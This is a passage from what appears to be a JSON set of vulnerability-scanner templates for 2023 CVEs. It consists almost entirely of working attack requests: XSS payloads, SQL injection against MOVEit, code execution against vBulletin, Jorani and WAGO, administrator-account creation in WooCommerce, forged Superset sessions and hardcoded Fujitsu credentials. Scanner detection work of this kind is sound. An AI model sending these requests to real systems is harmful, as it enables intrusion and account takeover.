/wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-26469","info":{"name":"Jorani 1.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /session/login HTTP/1.1\nHost: {{Hostname}}\n","POST /session/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword\n","GET /pages/view/log-{{date_time(\"%Y-%M-%D\")}} HTTP/1.1\nHost: {{Hostname}}\nX-REQUESTED-WITH: XMLHttpRequest\n{{header}}: {{base64(\"echo ---------;{{cmd}} 2>&1;echo ---------;\")}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=([\\d,]+)\\(.*?\\)"]},{"type":"status","part":"header_3","status":[401]}],"extractors":[{"type":"regex","part":"body","group":1,"internal":true,"name":"csrf","regex":["name=\"csrf_test_jorani\" value=\"(.*?)\""]}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-39600","info":{"name":"IceWarp 11.4.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38433","info":{"name":"Fujitsu IP Series - Hardcoded Credentials","severity":"high"},"requests":[{"raw":["GET /b_download/index.html HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username + ':' + password)}}\n"],"attack":"pitchfork","payloads":{"username":["fedish264pro","fedish265pro"],"password":["h264pro@broadsight","h265pro@broadsight"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Field Support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"cookie-reuse":true,"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4634","info":{"name":"Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt","{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Media Library Assistant"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site 